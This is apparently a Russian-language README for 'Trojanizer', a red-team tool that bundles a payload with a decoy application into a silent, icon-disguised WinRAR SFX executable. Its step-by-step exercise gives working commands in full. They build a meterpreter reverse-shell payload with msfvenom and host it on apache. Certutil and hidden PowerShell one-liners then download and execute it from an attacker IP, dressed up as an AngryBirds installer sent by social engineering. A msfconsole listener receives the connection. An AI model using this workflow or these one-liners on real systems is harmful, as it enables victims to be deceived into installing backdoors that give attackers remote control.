
Троянизация вашего пейлоада - автоматизация WinRAR (SFX) - на дистрибутивах Linux
Версия релиза: v1.1 (Stable)
Автор: pedro ubuntu [ r00t-3xp10it ]
Кодовое имя: Troia_Revisited
Поддерживаемые дистрибутивы: Ubuntu, Kali, Mint, Parrot OS
Suspicious-Shell-Activity (SSA) RedTeam разработка @2017
Инструмент Trojanizer использует WinRAR (SFX) для сжатия двух файлов, введённых пользователем,
и преобразует их в SFX-архив (.exe). Этот SFX-архив при выполнении
запускает оба файла (нашу полезную нагрузку и легитимное приложение одновременно).
Чтобы сделать архив менее подозрительным для цели во время выполнения, Trojanizer
попытается заменить стандартную иконку (.ico) SFX-файла на выбранную пользователем,
а также подавить все сообщения SFX-архива (Silent=1 | Overwrite=1).
'Trojanizer не создаёт троянов, но с точки зрения цели имитирует поведение трояна'
(выполняет полезную нагрузку в фоне, пока легитимное приложение работает на переднем плане).
Zenity (bash-GUIs) | Wine (x86|x64) | WinRAr.exe (установлен в wine)
"Trojanizer.sh скачает/установит все зависимости по мере необходимости"
╔────────────────────────────────────────────────────────────────────────────────────────────╗
| Рекомендуется отредактировать и настроить параметр: SYSTEM_ARCH=[ your_sys_arch ] |
| в файле 'settings' перед первой попыткой запуска инструмента. |
╚────────────────────────────────────────────────────────────────────────────────────────────╝
Trojanizer v1.1-Stable
.exe | .bat | .vbs | .ps1
"Все полезные нагрузки, которые Windows/SFX может автоматически извлечь и выполнить"
ПОДСКАЗКА: Если в файле settings выбран параметр 'SINGLE_EXEC=ON',
то Trojanizer будет принимать любой тип расширения файла.
.exe | .bat | .vbs | .ps1 | .jpg | .bmp | .doc | .ppt | и т.д.
"Все приложения, которые Windows/SFX может автоматически извлечь и выполнить"
╔─────────────────────────────────────────────────────────────────────────────────────────╗
| 'Расширенные опции' Trojanizer доступны только в файле 'settings', |
| и их можно настроить только перед запуском основного инструмента (Trojanizer.sh) |
╚─────────────────────────────────────────────────────────────────────────────────────────╝
-- Предварительная настройка (Presetup)
Trojanizer можно настроить на выполнение программы + команды перед извлечением/выполнением
двух сжатых файлов (SFX-архива). Это позволяет пользователям использовать предустановленное
программное обеспечение для выполнения удалённой команды до фактического извлечения на целевой системе.
Если активно, Trojanizer запросит (zenity sandbox) команду для выполнения
Trojanizer v1.1-Stable
-- single_file_execution
Рассмотрим следующий сценарий: у вас есть DLL-полезная нагрузка, которую нужно выполнить
после извлечения, но SFX-архивы не могут напрямую выполнять DLL-файлы. Этот параметр позволяет
пользователям ввести один batch-скрипт (.bat), который будет использоваться для выполнения DLL-полезной нагрузки.
Всё, что требуется от Trojanizer, — это указать SFX-архиву извлечь оба файла,
а затем выполнить script.bat.
Trojanizer v1.1-Stable
╔────────────────────────────────────────────────────────────────────────────────────────────────╗
| Поведение по умолчанию переключателя single_file_execution — сжать два введённых пользователем файла, |
| но выполнить только один из них во время извлечения (будет выполнен 2-й введённый файл) ... |
╚────────────────────────────────────────────────────────────────────────────────────────────────╝
╔────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╗
| Много отличной работы было проделано многими людьми, особенно @subTee, в области обхода белых списков приложений, |
| что в конечном итоге нам и нужно: выполнение произвольного кода с использованием встроенных бинарников Microsoft. |
| https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/ |
╚────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╝
Следующее упражнение описывает, как использовать расширенные переключатели Trojanizer 'single_file_execution' и 'Presetup' для
загрузки (удалённо) и выполнения любой полезной нагрузки с помощью однострочных команд обхода белого списка приложений с использованием 'certutil' или 'powershell' ..
1º - используем metasploit для создания полезной нагрузки
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.69 LPORT=666 -f exe -o payload.exe
2º - копируем payload.exe в корневой каталог apache2 и запускаем службу
cp payload.exe /var/www/html/payload.exe
service apache2 start
3º - редактируем файл настроек 'settings' Trojanizer и активируем:
PRE_SETUP=ON
SINGLE_EXEC=ON
4º - запуск инструмента Trojanizer
ПОЛЕЗНАЯ НАГРУЗКА ДЛЯ СЖАТИЯ => <путь-к>/screenshot.png (не имеет значения, что сжимать)
ВЫПОЛНИТЬ ЭТОТ ФАЙЛ ПОСЛЕ ИЗВЛЕЧЕНИЯ => <путь-к>/AngryBirds.exe (будет выполнен как приманка)
ОКНО ПРЕДВАРИТЕЛЬНОЙ НАСТРОЙКИ => cmd.exe /c certutil -urlcache -split -f http://192.168.1.69/payload.exe %TEMP%\\payload.exe && start %TEMP%\\payload.exe
ИМЯ SFX-ФАЙЛА => AngryBirds_installer (имя создаваемого SFX-архива)
ЗАМЕНИТЬ ИКОНКУ => Windows-Store.ico ИЛИ Steam-logo.ico
5º - запускаем слушатель и отправляем SFX-архив цели с помощью социальной инженерии
msfconsole -x 'use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 192.168.1.69; set lport 666; exploit'
╔────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╗
| Когда SFX-архив выполняется, он загружает payload.exe с нашего веб-сервера apache2 на целевую машину и |
| выполняет его перед извлечением 'screenshot.png' и 'AngryBirds.exe' (последний будет выполнен как приманка) |
╚────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╝
Следующая однострочная команда использует метод 'powershell(Downloadfile+start)' для достижения того же результата, что и предыдущее упражнение с 'certutil' ..
cmd.exe /c powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://192.168.1.69/payload.exe', '%TEMP%\\payload.exe') & start '%TEMP%\\payload.exe'
Следующая однострочная команда использует метод 'powershell(IEX+downloadstring)' для достижения почти того же (payload.ps1 не касается диска)
cmd.exe /c powershell.exe -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.69/payload.ps1'))"
1º - Скачать фреймворк с github
git clone https://github.com/r00t-3xp10it/trojanizer.git
2º - Установить права на выполнение файлов
cd trojanizer
sudo chmod +x *.sh
3º - Настроить фреймворк
nano settings
4º - Запустить основной инструмент
sudo ./Trojanizer.sh
xsf.conf - выполнение обоих файлов после извлечения (поведение трояна)
Trojanizer v1.1-Stable
xsf.conf - single_file_execution + Presetup (расширенные опции)
Trojanizer v1.1-Stable
xsf.conf - single_file_execution + Presetup + обход белого списка приложений (certutil)
Trojanizer v1.1-Stable
xsf.conf - single_file_execution + Presetup + обход белого списка приложений (powershell IEX)
Trojanizer v1.1-Stable
Готовый SFX-архив с изменённой иконкой
Trojanizer v1.1-Stable
Внутри SFX-архива (открыт winrar) - поведение трояна
Trojanizer v1.1-Stable
Внутри SFX-архива (открыт winrar) - single_file_execution
Trojanizer v1.1-Stable
Trojanizer - фальшивый установщик AVG (поведение трояна)
https://www.youtube.com/watch?v=BIn6_ccZrI0
Trojanizer - single_file_execution (не поведение трояна)
https://www.youtube.com/watch?v=Ze0JkVtKbns
@subTee | @enigma0x3 | @H4d3s (SSA)
Ссылки:
http://acritum.com/software/manuals/winrar/
https://blog.conscioushacker.io/index.php/2017/11/17/application-whitelisting-bypass-msbuild-exe/
https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/
https://github.com/r00t-3xp10it/trojanizer/issues